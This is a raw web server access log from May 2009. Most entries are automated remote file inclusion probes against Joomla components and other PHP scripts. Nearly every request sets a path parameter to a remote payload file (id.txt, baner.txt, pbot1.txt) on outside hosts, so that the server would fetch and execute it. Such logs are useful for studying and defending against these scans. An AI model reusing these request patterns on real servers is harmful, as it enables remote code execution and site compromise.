72.232.198.162 - - [31/May/2009:05:56:35 -0400] "GET /logs//administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.810"
72.232.198.162 - - [31/May/2009:05:56:42 -0400] "GET /logs/error_log.Q108061300//administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 292 "-" "libwww-perl/5.810"
72.232.198.162 - - [31/May/2009:05:56:42 -0400] "GET //administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.810"
72.232.198.162 - - [31/May/2009:05:56:42 -0400] "GET /logs//administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.810"
74.208.111.178 - - [31/May/2009:05:56:42 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.232.198.162 - - [31/May/2009:05:56:47 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.810"
72.232.198.162 - - [31/May/2009:05:56:50 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.810"
200.107.3.73 - - [31/May/2009:05:56:53 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
200.107.3.73 - - [31/May/2009:05:56:53 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
200.107.3.73 - - [31/May/2009:05:56:53 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
72.232.198.162 - - [31/May/2009:05:57:01 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.810"
72.232.198.162 - - [31/May/2009:05:57:01 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.810"
72.232.198.162 - - [31/May/2009:05:57:01 -0400] "GET //administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.810"
72.232.198.162 - - [31/May/2009:05:57:01 -0400] "GET //administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.810"
72.232.198.162 - - [31/May/2009:05:57:01 -0400] "GET /logs//administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.810"
72.232.198.162 - - [31/May/2009:05:57:01 -0400] "GET /logs//administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.810"
200.107.3.73 - - [31/May/2009:05:57:29 -0400] "GET /logs/access_log.Q109051100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
72.232.198.162 - - [31/May/2009:05:58:02 -0400] "GET /logs/access_log.Q109050900//administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.810"
72.232.198.162 - - [31/May/2009:05:58:02 -0400] "GET /logs/access_log.Q109050900//administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.810"
216.191.52.68 - - [31/May/2009:05:58:02 -0400] "GET /logs//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://imagehut.ws/logopsd/baner.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.191.52.68 - - [31/May/2009:05:58:02 -0400] "GET /logs/access_log.Q109051600//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://imagehut.ws/logopsd/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.191.52.68 - - [31/May/2009:05:58:02 -0400] "GET //index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://imagehut.ws/logopsd/baner.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.72.93 - - [31/May/2009:05:58:27 -0400] "GET /logs//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.122.72.93 - - [31/May/2009:05:58:27 -0400] "GET //index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.72.93 - - [31/May/2009:05:58:27 -0400] "GET /logs/access_log.Q109051600//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:05:58:47 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:05:58:48 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:05:58:49 -0400] "GET /logs/access_log.Q109010700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
124.217.216.86 - - [31/May/2009:05:58:50 -0400] "GET /?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/ccn.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.826"
69.50.197.106 - - [31/May/2009:05:58:57 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:05:58:58 -0400] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:05:58:58 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:05:59:02 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:05:59:07 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:05:59:07 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:05:59:07 -0400] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:05:59:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.50.197.106 - - [31/May/2009:05:59:11 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.208.111.178 - - [31/May/2009:05:59:34 -0400] "GET /logs/access_log.Q109051800%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.208.111.178 - - [31/May/2009:05:59:39 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.146.255.11 - - [31/May/2009:06:00:08 -0400] "GET //index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.214.120.47 - - [31/May/2009:06:00:09 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.superlaundry.com//images/.bash/id.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
218.146.255.11 - - [31/May/2009:06:00:10 -0400] "GET /logs//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.146.255.11 - - [31/May/2009:06:00:10 -0400] "GET /logs/access_log.Q109051600//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:06:00:50 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:06:00:51 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:06:00:52 -0400] "GET /logs/access_log.Q109010700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.27.203.107 - - [31/May/2009:06:00:55 -0400] "GET /logs//ashnews.php?pathtoashnews=http://shoemasterkorea.com/board/data/test.txt??? HTTP/1.1" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
218.27.203.107 - - [31/May/2009:06:00:55 -0400] "GET //ashnews.php?pathtoashnews=http://shoemasterkorea.com/board/data/test.txt??? HTTP/1.1" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
112.175.141.41 - - [31/May/2009:06:01:42 -0400] "GET //index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
112.175.141.41 - - [31/May/2009:06:01:42 -0400] "GET /logs//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
63.147.72.145 - - [31/May/2009:06:01:43 -0400] "GET /logs/access_log.Q109051100//include/write.php?dir=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
112.175.141.41 - - [31/May/2009:06:01:46 -0400] "GET /logs/access_log.Q109051600//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
88.40.90.61 - - [31/May/2009:06:02:12 -0400] "GET //admin/classes/errors.php?error=http://shoemasterkorea.com/board/data/test.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
88.40.90.61 - - [31/May/2009:06:02:12 -0400] "GET /logs//admin/classes/errors.php?error=http://shoemasterkorea.com/board/data/test.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
69.50.197.106 - - [31/May/2009:06:02:24 -0400] "GET /logs/access_log.Q109051800%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.182.124.1 - - [31/May/2009:06:02:25 -0400] "GET //?path%5Bdocroot%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 200 452 "-" "Mozilla/5.0"
64.182.124.1 - - [31/May/2009:06:02:25 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 200 3567 "-" "Mozilla/5.0"
64.182.124.1 - - [31/May/2009:06:02:25 -0400] "GET /logs/access_log.Q109051800//?path%5Bdocroot%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 226 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:06:02:29 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.72.93 - - [31/May/2009:06:02:43 -0400] "GET /logs/access_log.Q109051600%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.182.124.1 - - [31/May/2009:06:02:48 -0400] "GET /logs/access_log.Q109051700//?path%5Bdocroot%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 226 "-" "Mozilla/5.0"
64.182.124.1 - - [31/May/2009:06:03:16 -0400] "GET //?path%5Bdocroot%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 200 452 "-" "Mozilla/5.0"
64.182.124.1 - - [31/May/2009:06:03:16 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 200 3567 "-" "Mozilla/5.0"
64.182.124.1 - - [31/May/2009:06:03:16 -0400] "GET /logs/access_log.Q109051800%20%20//?path%5Bdocroot%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 228 "-" "Mozilla/5.0"
209.51.152.234 - - [31/May/2009:06:04:00 -0400] "GET /logs/?_zb_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid1.txt? HTTP/1.1" 200 3562 "-" "libwww-perl/5.811"
209.51.152.234 - - [31/May/2009:06:04:00 -0400] "GET /?_zb_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid1.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.811"
216.191.52.68 - - [31/May/2009:06:04:08 -0400] "GET /logs/access_log.Q109051600%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://imagehut.ws/logopsd/baner.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:06:04:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.182.124.1 - - [31/May/2009:06:04:14 -0400] "GET /logs/access_log.Q109051700%20%20//?path%5Bdocroot%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 228 "-" "Mozilla/5.0"
222.122.72.93 - - [31/May/2009:06:04:51 -0400] "GET /logs/error_log.Q109051600%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:06:04:56 -0400] "GET //index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:06:04:57 -0400] "GET /logs//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:06:04:57 -0400] "GET /logs/access_log.Q109051800%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:06:04:58 -0400] "GET /logs/access_log.Q109051600//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:06:05:01 -0400] "GET //index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:06:05:02 -0400] "GET /logs//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:06:05:02 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:06:05:03 -0400] "GET /logs/access_log.Q109051600//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:06:05:19 -0400] "GET //index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:06:05:21 -0400] "GET /logs//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:06:05:21 -0400] "GET /logs/access_log.Q109051600//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:06:06:43 -0400] "GET /?GALLERY_BASEDIR=http://primkray.ru/clx/copyright? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:06:06:43 -0400] "GET /logs/?GALLERY_BASEDIR=http://primkray.ru/clx/copyright? HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:06:06:43 -0400] "GET /logs/access_log.Q109051500/?GALLERY_BASEDIR=http://primkray.ru/clx/copyright? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:06:06:43 -0400] "GET /?GALLERY_BASEDIR=http://primkray.ru/clx/copyright? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:06:06:43 -0400] "GET /logs/access_log.Q109051500/?GALLERY_BASEDIR=http://primkray.ru/clx/copyright? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:06:06:43 -0400] "GET /logs/?GALLERY_BASEDIR=http://primkray.ru/clx/copyright? HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
112.175.141.41 - - [31/May/2009:06:07:14 -0400] "GET /logs/access_log.Q109051600%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.231.138.99 - - [31/May/2009:06:07:26 -0400] "GET /logs/error_log.Q109042900//components/com_extcalendar/admin_events.php?CONFIG_EXT[****************S_DIR]=http://www.superlaundry.com//images/.bash/id.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.65"
83.231.138.99 - - [31/May/2009:06:07:26 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[****************S_DIR]=http://www.superlaundry.com//images/.bash/id.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
83.231.138.99 - - [31/May/2009:06:07:26 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[****************S_DIR]=http://www.superlaundry.com//images/.bash/id.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
89.234.63.110 - - [31/May/2009:06:07:32 -0400] "GET /logs/access_log.Q109051600/?GALLERY_BASEDIR=http://primkray.ru/clx/copyright? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:06:07:32 -0400] "GET /logs/access_log.Q109051600/?GALLERY_BASEDIR=http://primkray.ru/clx/copyright? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
72.232.198.162 - - [31/May/2009:06:07:57 -0400] "GET /logs/error_log.Q109042900//administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 292 "-" "libwww-perl/5.810"
72.232.198.162 - - [31/May/2009:06:07:57 -0400] "GET //administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.810"
72.232.198.162 - - [31/May/2009:06:07:58 -0400] "GET /logs/error_log.Q109042900//administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 292 "-" "libwww-perl/5.810"
72.232.198.162 - - [31/May/2009:06:07:58 -0400] "GET /logs//administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.810"
72.232.198.162 - - [31/May/2009:06:07:58 -0400] "GET //administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.810"
72.232.198.162 - - [31/May/2009:06:07:59 -0400] "GET /logs//administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.810"
38.99.44.103 - - [31/May/2009:06:07:35 -0400] "GET /logs/access_log.Q109051500 HTTP/1.0" 200 6117848 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
72.232.198.162 - - [31/May/2009:06:08:33 -0400] "GET /logs/access_log.Q109050300//administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.810"
72.232.198.162 - - [31/May/2009:06:08:34 -0400] "GET /logs/access_log.Q109050300//administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.810"
216.191.52.68 - - [31/May/2009:06:08:41 -0400] "GET /logs/access_log.Q109051500%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://imagehut.ws/logopsd/baner.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.182.124.1 - - [31/May/2009:06:08:45 -0400] "GET //?path%5Bdocroot%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 200 452 "-" "Mozilla/5.0"
64.182.124.1 - - [31/May/2009:06:08:45 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 200 3567 "-" "Mozilla/5.0"
64.182.124.1 - - [31/May/2009:06:08:45 -0400] "GET /logs/access_log.Q109051800%20%20//?path%5Bdocroot%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:06:09:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.182.124.1 - - [31/May/2009:06:09:28 -0400] "GET /logs/access_log.Q109051700%20%20//?path%5Bdocroot%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 228 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:06:09:45 -0400] "GET /logs/access_log.Q109051500%20%20/?GALLERY_BASEDIR=http://primkray.ru/clx/copyright? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:06:09:46 -0400] "GET /logs/access_log.Q109051500%20%20/?GALLERY_BASEDIR=http://primkray.ru/clx/copyright? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:06:09:57 -0400] "GET /logs/access_log.Q109051600%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:06:09:57 -0400] "GET /logs/access_log.Q109051600%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:06:09:58 -0400] "GET /logs/access_log.Q109051600%20%20/?GALLERY_BASEDIR=http://primkray.ru/clx/copyright? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:06:10:02 -0400] "GET /logs/access_log.Q109051600%20%20/?GALLERY_BASEDIR=http://primkray.ru/clx/copyright? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
78.31.64.178 - - [31/May/2009:06:10:05 -0400] "GET /logs/access_log.Q109051700//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:06:10:07 -0400] "GET /logs/access_log.Q109051700//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:06:10:07 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:06:10:08 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:06:10:08 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
